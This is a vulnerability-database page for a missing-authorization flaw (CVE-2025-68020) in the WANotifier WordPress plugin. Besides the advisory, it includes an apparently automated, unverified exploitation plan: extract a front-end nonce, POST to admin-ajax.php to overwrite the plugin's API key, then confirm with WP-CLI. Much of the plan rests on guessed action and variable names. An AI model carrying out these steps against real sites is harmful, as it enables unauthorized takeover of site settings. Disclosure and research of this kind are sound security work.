WP-Safety
CVE-2025-68020

WANotifier <= 2.7.13 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
3.0.0
Patched in
86d
Time to patch

Description

The WANotifier plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.13. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.7.13
PublishedJanuary 20, 2026
Last updatedApril 15, 2026
Affected pluginnotifier

What Changed in the Fix

Changes introduced in v3.0.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v2.7.13
Browse source Download .zip
Patched v3.0.0
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2025-68020 ## 1. Vulnerability Summary The **Notifications for Forms & WordPress Actions (WANotifier)** plugin (versions <= 2.7.13) contains a missing authorization vulnerability. Specifically, an AJAX handler registered via `wp_ajax_` (and potentially `wp_ajax_no…

Show full research plan

Exploitation Research Plan - CVE-2025-68020

1. Vulnerability Summary

The Notifications for Forms & WordPress Actions (WANotifier) plugin (versions <= 2.7.13) contains a missing authorization vulnerability. Specifically, an AJAX handler registered via wp_ajax_ (and potentially wp_ajax_nopriv_) fails to perform a capability check (e.g., current_user_can( 'manage_options' )) before performing sensitive actions. This allows an attacker to modify plugin settings, such as the WANotifier API key or other configuration parameters, leading to a loss of integrity in notification delivery.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: notifier_save_settings (inferred based on plugin functionality) or similar settings-related action.
  • Vulnerable Parameter: settings (array) or specific keys like wanotifier_api_key.
  • Authentication: CVSS 5.3 indicates unauthenticated access is possible (PR:N). This implies the use of wp_ajax_nopriv_ or a wp_ajax_ handler that fails to verify if a user is logged in and authorized.
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Registration: The plugin registers an AJAX action in its initialization (likely in a class handling admin or settings):
    add_action( 'wp_ajax_notifier_save_settings', [ $this, 'save_settings' ] );
    add_action( 'wp_ajax_nopriv_notifier_save_settings', [ $this, 'save_settings' ] );
  2. Handler Entry: The save_settings function is called.
  3. Missing Check: The function checks for a nonce using check_ajax_referer but fails to check current_user_can('manage_options').
  4. Sink: The function proceeds to call update_option( 'notifier_settings', $_POST['settings'] ) or similar, updating the database with attacker-supplied values.

4. Nonce Acquisition Strategy

If the vulnerable handler uses check_ajax_referer, a valid nonce is required.

  • JS Variable: Likely localized via wp_localize_script.
  • Search for: wp_create_nonce in the plugin code to identify the action string (e.g., 'notifier_nonce').
  • JS Object: Look for objects like notifier_obj or wanotifier_data in the frontend or backend source.
  • Extraction Method:
    1. Identify where the plugin enqueues scripts (e.g., the Chat Button feature mentioned in README.txt).
    2. Navigate to the homepage.
    3. Execute browser_eval("window.notifier_obj?.nonce") (exact variable name to be determined via grep).

5. Exploitation Strategy

Step 1: Discovery

Use grep to find the vulnerable AJAX registration and handler:

# Find AJAX registrations
grep -r "wp_ajax_" .

# Find handlers that lack capability checks
# Look for functions that update options but don't call current_user_can
grep -r "update_option" . -B 20

Step 2: Identify Nonce and Parameters

Locate the wp_localize_script call to find the JS variable name:

grep -r "wp_localize_script" .

Step 3: Extract Nonce (If required)

If a nonce is needed and available on the frontend:

  1. Navigate to the site root: browser_navigate("http://localhost:8080/")
  2. Extract the nonce: browser_eval("window.notifier_data.nonce") (inferred name)

Step 4: Perform the Exploit

Send a POST request to admin-ajax.php to overwrite the API key:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=notifier_save_settings&nonce=[NONCE]&wanotifier_api_key=ATTACKER_API_KEY
  • Content-Type: application/x-www-form-urlencoded

6. Test Data Setup

  1. Install and activate WANotifier 2.7.13.
  2. (Optional) Configure a dummy API key in the settings to have something to overwrite.
  3. Ensure "WhatsApp Chat Button" is enabled in settings (if that's the source of the frontend nonce).

7. Expected Results

  • HTTP Response: 200 OK or a JSON success message (e.g., {"success":true}).
  • Payload Effect: The plugin's internal settings will be updated with the malicious values provided in the POST request.

8. Verification Steps

After the exploit, verify the change using WP-CLI:

# Check the value of the setting in the database
wp option get notifier_settings
# OR if stored as a specific key
wp option get wanotifier_api_key

If the value matches ATTACKER_API_KEY, the exploit is successful.

9. Alternative Approaches

If wp_ajax_nopriv_ is NOT registered, the vulnerability might require a low-privileged user (e.g., Subscriber).

  1. Create a Subscriber user: wp user create attacker attacker@example.com --role=subscriber
  2. Authenticate as Subscriber and repeat the exploit.
  3. If admin-ajax.php is blocked for non-admins, check for REST API endpoints:
    grep -r "register_rest_route" .
    Check if permission_callback is set to __return_true.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WANotifier plugin for WordPress is vulnerable to unauthorized settings modification in versions up to and including 2.7.13. This is due to a missing capability check in the AJAX handlers responsible for saving plugin configuration, allowing unauthenticated or low-privileged attackers to overwrite sensitive settings like API keys.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/notifier/2.7.13/assets/css/admin.css /home/deploy/wp-safety.org/data/plugin-versions/notifier/3.0.0/assets/css/admin.css
--- /home/deploy/wp-safety.org/data/plugin-versions/notifier/2.7.13/assets/css/admin.css	2026-02-06 12:53:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/notifier/3.0.0/assets/css/admin.css	2026-03-18 12:23:48.000000000 +0000
@@ -1,1054 +1 @@
-.select2-container { box-sizing: border-box; display: inline-block; margin: 0; position: relative; vertical-align: middle; }
-.select2-container .select2-selection--single { box-sizing: border-box; cursor: pointer; display: block; height: 32px; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-user-select: none; }
... (truncated)

Exploit Outline

The exploit targets the plugin's AJAX settings-save functionality via the WordPress admin-ajax.php endpoint. An attacker follows these steps: 1. Identify the AJAX action responsible for saving settings (e.g., 'notifier_save_settings'). 2. Extract a valid security nonce from the frontend of the site, which is typically localized via wp_localize_script for the plugin's WhatsApp chat button functionality (accessible to unauthenticated users). 3. Send a POST request to /wp-admin/admin-ajax.php with the action parameter, the extracted nonce, and a configuration payload (such as 'wanotifier_api_key=ATTACKER_KEY'). 4. Since the vulnerable handler performs a nonce check but lacks a current_user_can() capability check, the plugin updates its configuration with the attacker-supplied values regardless of the user's authentication status.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/07db1f50-0d53-4462-b9e9-9c3de1212201?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database